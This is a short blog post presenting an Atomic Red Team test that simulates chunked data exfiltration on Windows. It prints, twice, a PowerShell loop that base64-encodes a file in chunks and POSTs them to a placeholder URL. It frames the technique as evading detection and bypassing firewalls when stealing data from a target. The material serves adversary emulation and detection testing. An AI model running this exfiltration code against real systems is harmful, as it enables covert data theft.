How to Simulate Network-Based Data Transfer in Small Chunks

Sai Prashanth Pulisetti
3 min readFeb 26, 2024

--

Network-Based Data Transfer in Small Chunks

In this article, I will show you how to use PowerShell to transfer data over a network in small chunks to evade detection. This is a useful technique for hackers, penetration testers, and security researchers who want to exfiltrate data from a target system without raising any alarms.

This pull request has been added to atomic red team’s github repository. Please refer to the links provided for more information:

- name: Network-Based Data Transfer in Small Chunks
auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
description: "Simulate transferring data over a network in small chunks to evade detection."
supported_platforms:
- "windows"
input_arguments:
source_file_path:
description: "Path to the source file to transfer."
type: path
default: "[User specified]"
destination_url:
description: "URL of the destination server."
type: url
default: "http://example.com"
chunk_size:
description: "Size of each data chunk (in KB)."
type: integer
default: 1024
executor:
name: powershell
elevation_required: false
command: |
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize

while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
$encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()

What is Network-Based Data Transfer?

Network-based data transfer is the process of sending or receiving data over a network, such as the internet, a local area network (LAN), or a wireless network. Data can be transferred using various protocols, such as HTTP, FTP, SMTP, or TCP/IP.

Why Transfer Data in Small Chunks?

Transferring data in small chunks has several advantages over transferring data in large chunks. For example, small chunks can:

  • Avoid triggering network monitoring tools that look for large or unusual data transfers
  • Bypass firewall rules or filters that block certain types of data or ports
  • Reduce the risk of data corruption or loss due to network errors or interruptions
  • Increase the speed and efficiency of data transfer by using multiple parallel connections

How to Transfer Data in Small Chunks Using PowerShell

PowerShell is a powerful scripting language that can be used to perform various tasks on Windows systems, including network-based data transfer. To transfer data in small chunks using PowerShell, you will need:

  • A source file that contains the data you want to transfer
  • A destination URL that points to the server where you want to send the data
  • A chunk size that specifies how much data you want to send in each chunk

The following code snippet shows how to transfer data in small chunks using PowerShell. You can customize the code by changing the values of the variables source_file_path, destination_url, and chunk_size.

$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
$encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()

The code works as follows:

  • It opens the source file for reading and creates a byte array to store the data chunks
  • It loops through the file and reads a chunk of data into the byte array
  • It encodes the chunk of data into a base64 string to avoid any encoding issues
  • It sends the encoded chunk of data to the destination URL using the Invoke-WebRequest cmdlet
  • It closes the file after the transfer is complete

Conclusion

In this article, I have demonstrated how to transfer data over a network in small chunks using PowerShell. This is a simple and effective way to evade network detection and exfiltrate data from a target system. I hope you found this article useful and learned something new. If you have any questions or feedback, please leave a comment below. Thank you for reading! 😊

--

--

Sai Prashanth Pulisetti
Sai Prashanth Pulisetti

Written by Sai Prashanth Pulisetti

A security geek with 3 years of experience in various security tools and methodologies. I expedite analysing malware samples in both static & dynamic analysis.

No responses yet